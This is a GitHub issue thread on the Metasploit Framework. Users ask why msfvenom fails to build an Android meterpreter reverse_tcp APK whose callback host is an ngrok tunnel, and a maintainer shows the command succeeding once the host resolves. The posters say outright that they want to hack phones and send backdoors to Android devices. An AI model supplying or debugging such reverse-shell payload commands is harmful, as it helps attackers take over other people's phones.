### ISSUE TITLE
msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.ngrok.io LPORT=5544 -o aju1.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload Error: One or more options failed to validate: LHOST.

### ISSUE THREAD

**Issue by Adeebf** [rapid7/metasploit-framework#16006]
## Relevant information

Help me

**Comment by bcoles** [comment]
Error: One or more options failed to validate: LHOST

**Comment by Adeebf** [comment]
> 
How to solve this

**Comment by bcoles** [comment]
> > 
> 
> How to solve this

Specify a correct value for `LHOST`.

**Comment by Adeebf** [comment]
I am trying to hack using WAN method,and the LHOST is from ngrok

**Comment by Adeebf** [comment]
> > > 
> > 
> > 
> > How to solve this
> 
> Specify a correct value for `LHOST`.

I am trying to hack using WAN method,and the LHOST is from ngrok.I am just a beginner.I followed the correct steps shown on google.But it doesn't work for me.

**Comment by bcoles** [comment]
`msfvenom` attempts to resolve the host specified in the `LHOST` option to an IP address.

Is your host able to resolve `4.tcp.ngrok.io`?

```
# dig +short 4.tcp.ngrok.io
3.136.65.236

# ./msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.ngrok.io LPORT=5544 -o aju1.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10187 bytes
Saved as: aju1.apk

# file aju1.apk 
aju1.apk: Zip archive data, at least v2.0 to extract, compression method=deflate

# ls -la aju1.apk 
-rw-r--r-- 1 root root 10187 Dec 30 07:45 aju1.apk
```

**Comment by vamos-tech** [comment]
bonjour quelqu'un peut-il m'aider sur la configuration de ngrok sur fatrat afin d'nevoyer un payload à un android?

**Comment by vamos-tech** [comment]
bonjour lors de la creation d'un backdoor pour android avec msfvenom et ngrok, voici l'erreur qui s'affiche: 
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload Error: One or more options failed to validate: LHOST.
quelqu'un peut-il m'apporter son aide?
